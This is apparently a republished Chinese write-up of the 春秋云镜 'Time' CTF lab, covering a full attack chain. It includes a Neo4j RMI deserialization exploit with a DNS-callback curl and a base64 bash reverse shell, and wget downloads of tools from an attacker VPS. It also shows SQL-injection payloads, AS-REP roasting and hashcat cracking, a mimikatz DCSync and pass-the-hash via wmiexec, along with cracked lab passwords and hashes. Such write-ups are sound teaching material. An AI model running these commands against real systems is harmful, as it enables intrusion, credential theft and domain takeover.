欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 房产 > 家装 > 春秋云镜 Time Writeup

春秋云镜 Time Writeup

2025/5/14 6:11:59 来源:https://blog.csdn.net/mochu7777777/article/details/147916990  浏览:    关键词:春秋云镜 Time Writeup

在这里插入图片描述

文章目录

  • 外网打点
  • 内网信息收集&注入获取域内用户名
  • 获取Kerberos无预认证用户TGT
  • 利用HasSIDHistory权限获取域控哈希

外网打点

IP端口扫描发现开放了如下端口:
在这里插入图片描述

7474 端口发现是Neo4j Browser服务

Neo4j Browser 是 Neo4j 图数据库自带的一个 图形化用户界面 (GUI) 工具,主要用于与 Neo4j 数据库进行交互。它是开发者和数据分析人员常用的工具之一,帮助他们直观地编写查询、可视化图数据、调试语句和探索数据库结构。

在这里插入图片描述

该版本为3.4.18;在Neo4j 3.4.18及以前,如果开启了Neo4j Shell接口(Neo4j Shell默认端口1337),攻击者将可以通过RMI协议以未授权的身份调用任意方法,其中setSessionVariable方法存在反序列化漏洞。因为这个漏洞并非RMI反序列化,所以不受到Java版本的影响。(CVE-2021-34371)

Neo4j 3.5及之后的版本,Neo4j ShellCyber Shell替代。

先打个DNS验证一下:

java.exe -jar .\rhino_gadget.jar rmi://39.99.226.170:1337 "curl neo4j.jr3skk.dnslog.cn"

在这里插入图片描述

然后尝试反弹:

java.exe -jar .\rhino_gadget.jar rmi://39.99.226.170:1337 "bash -c {echo,L2.........}|{base64,-d}|{bash,-i}"

在这里插入图片描述

成功反弹,并在/home/neo4j/下找到第一个flag:
在这里插入图片描述

内网信息收集&注入获取域内用户名

# frpc.toml
[common]
server_addr = x.x.x.x
server_port = 7000[socks_proxy]
type = tcp
remote_port = 18080
plugin = socks5
# frps.toml
[common]
bindPort = 7000

wget获取内网穿透工具代理工具(frp)和资产探测工具(Fscan)到服务器上去,添加权限执行收集内网信息

# vps上开启http服务
python3 -m http.server 8080# 入口服务器上wget远程下载
wget http://x.x.x.x:8080/frpc -O frpc
wget http://x.x.x.x:8080/frpc.toml -O frpc.toml
wget http://x.x.x.x:8080/fscan -O fscan# 添加执行权限
chmod +x frpc
chmod +x fscan

在这里插入图片描述

172.22.6.36/24C段扫描结果:

start ping
(icmp) Target 172.22.6.25     is alive
(icmp) Target 172.22.6.12     is alive
(icmp) Target 172.22.6.36     is alive
(icmp) Target 172.22.6.38     is alive
[*] Icmp alive hosts len is: 4
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.36:22 open
172.22.6.12:445 open
172.22.6.25:445 open
172.22.6.12:139 open
172.22.6.25:139 open
172.22.6.12:135 open
172.22.6.25:135 open
172.22.6.12:88 open
172.22.6.36:7687 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo 
[*]172.22.6.25[->]WIN2019[->]172.22.6.25
[*] NetInfo 
[*]172.22.6.12[->]DC-PROGAME[->]172.22.6.12
[*] OsInfo 172.22.6.12  (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.6.12     [+] DC:DC-PROGAME.xiaorang.lab       Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.6.25     XIAORANG\WIN2019              
[*] WebTitle http://172.22.6.38        code:200 len:1531   title:后台登录
[*] WebTitle https://172.22.6.36:7687  code:400 len:50     title:None
已完成 11/11
[*] 扫描结束,耗时: 13.385324785s
2.22.6.36:7687  code:400 len:50     title:None

本地Proxifier配置:

在这里插入图片描述
在这里插入图片描述

172.22.6.38存在一个后台登录

在这里插入图片描述

测试功能发现username处存在SQL注入,构造万能密码可成功登录。

在这里插入图片描述
在这里插入图片描述

在数据库中翻到了flag02

# 查库
username=admin'union+select+1,group_concat(schema_name),3+from+information_schema.schemata--+&password=admin
[+]: mysql,information_schema,performance_schema,sys,oa_db# 查表
username=admin'union+select+1,group_concat(table_name),3+from+information_schema.tables+where+table_schema='oa_db'--+&password=admin
[+]: oa_admin,oa_f1Agggg,oa_users# 查字段
username=admin'union+select+1,group_concat(column_name),3+from+information_schema.columns+where+table_name='oa_f1Agggg'--+&password=admin
[+]: id,flag02# 查内容
username=admin'union+select+1,group_concat(id,flag02),3+from+oa_db.oa_f1Agggg--+&password=admin

在这里插入图片描述
oa_db.oa_admin找到管理员账号密码

username=admin'union+select+1,group_concat(id,0x7c,username,0x7c,password),3+from+oa_db.oa_admin--+&password=admin

在这里插入图片描述
在这里插入图片描述

该账号成功登录,但是并无后台。继续找oa_db.oa_users

因为该表数据较多,group_concat()受长度限制(单次查询最多输出1024字符),使用sqlmap跑更为方便

python2 sqlmap.py -r data.req --dbms "MySQL" -p "username" -D "oa_db" -T "oa_users" -C "id,email,phone,username" --dump --batch

在这里插入图片描述
在这里插入图片描述

获取Kerberos无预认证用户TGT

oa_users表中email字段为用户名@域名的格式,可以尝试用来做域内用户枚举

./kerbrute_linux_amd64 userenum --dc 172.22.6.12 -d xiaorang.lab oa_users.txt -o exist_users.txt

在这里插入图片描述

整理出这些域内用户,从目标域控制器获取Kerberos无预认证(Pre-Authentication) 的用户的TGT(Ticket Granting Ticket)

python .\examples\GetNPUsers.py -dc-ip 172.22.6.12 -usersfile C:\Users\Administrator\Downloads\exist_domain_users.txt xiaorang.lab/

在这里插入图片描述

wenshao@xiaorang.labzhangxin@xiaorang.lab两个用户可以直接获取到凭证,hashcat爆破

hashcat.exe -m 18200 '$krb5asrep$23$zhangxin@xiaorang.lab@XIAORANG.LAB:770ddf888888d8fdb2a875759300b075$8b9e828608dab5c5f34652019e714707a0221aa21e81d09cb760de9482a9fd37294405a387220d7572254ff2be3f9cea09d3320a72752b74b32a2d3ef70d8282c116a516b843b60853c6d3c0de43cf9e4ccf6514c243ccf7a41ab5f30577a52aba6a96c591a2d2152b4e6a24c8c87c26377c0ac9672f6330ef753929b3ad3b009359b2a0bfadae878f4838b6cb21aaf08268a654c1a1fa18aafe461c1814505909218c585cec79d232a84675f404f0462bb8318b4ace5d336e31d958c7cd921db16fe1e72c0214672f5985226055bf8c0f213744ffaef36c71802187b900f29776095a9e8bfcd42b5ff41ff0' D:\Tools\Penet\Dictionary\rockyou.txt --force

在这里插入图片描述

hashcat.exe -m 18200 '$krb5asrep$23$wenshao@xiaorang.lab@XIAORANG.LAB:25386e0cafd59750c6b62609b72b8ed9$cd55fb284d543660ba9b24e2090be422b675ec09b9fcedee92683ae056132738d686f7d1dcf4c01d53426c8da4ff0a04506d98233ae099c732e12ee9fce22fc9d9f4031f52977f19e2146230c722c5c58102c7a972dbedc95c82674bafc11a82d5e56dc9ea6b98a6f42f9ee755073bcb8af603e78cfcd177e2847cbe1712d42c8688eccba027ca11a4d1956890ed70507b8d52cfa1474944279c0d85ba54acfd2bbb271d5db99e51dfe111f348b072fea723f0f7ffb62651bb097bde9ac570761052a500689abc5f8cae5cbfa190337ec2da8e488486c704fa072069953473c2290776ec325679a6cf537ff4' D:\Tools\Penet\Dictionary\rockyou.txt --force

在这里插入图片描述

得到两个域内账户:

  • 账户:zhangxin@xiaorang.lab;密码:strawberry
  • 账户:wenshao@xiaorang.lab;密码:hellokitty

均可远程登录172.22.6.25

在这里插入图片描述

query user查看服务器用户会话信息时发现了另一个yuxuan本地用户使用中。

在这里插入图片描述

推测使用了Windows自动登录:Windows自动登录:https://developer.aliyun.com/article/485613

如果目标 Windows主机开启了自动登录机制,那么将无需输入用户名密码即可登录。通过注册表修改实现。Windows内置了自动登录的机制,在登录系统时,winlogon会检查注册表下有没有设置自动登录,如果设置了就上就会读取用户名和密码,然后进行验证,通过后就登录进系统了。

reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

在这里插入图片描述

得到yuxuan@xiaorang.lab的密码:Yuxuan7QbrgZ3L

利用HasSIDHistory权限获取域控哈希

SharpHound域内信息收集,BloodHound分析域内关系:

在这里插入图片描述
在这里插入图片描述
发现yuxuan@xiaorang.labHasSIDHistory权限

HasSIDHistory: 用户的SID历史记录,用户在域迁移后,票据还包含着前域所在组的SID,虽然用户不属于前域,但仍拥有前域的权限

yuxuan@xiaorang.lab有这个权限可以直接DCsync导出域控的哈希

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

在这里插入图片描述

拿到域控Administrator的哈希,直接PTH过去执行命令获取flag04:

python .\examples\wmiexec.py XIAORANG/administrator@172.22.6.12 -hashes ':04d93ffd6f5f6e4490e0de23f240a5e9'

在这里插入图片描述
在这里插入图片描述

同样的,再在XIAORANG\WIN2019上执行获取到flag03:

python .\examples\wmiexec.py XIAORANG/administrator@172.22.6.25 -hashes ':04d93ffd6f5f6e4490e0de23f240a5e9'

在这里插入图片描述

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

热搜词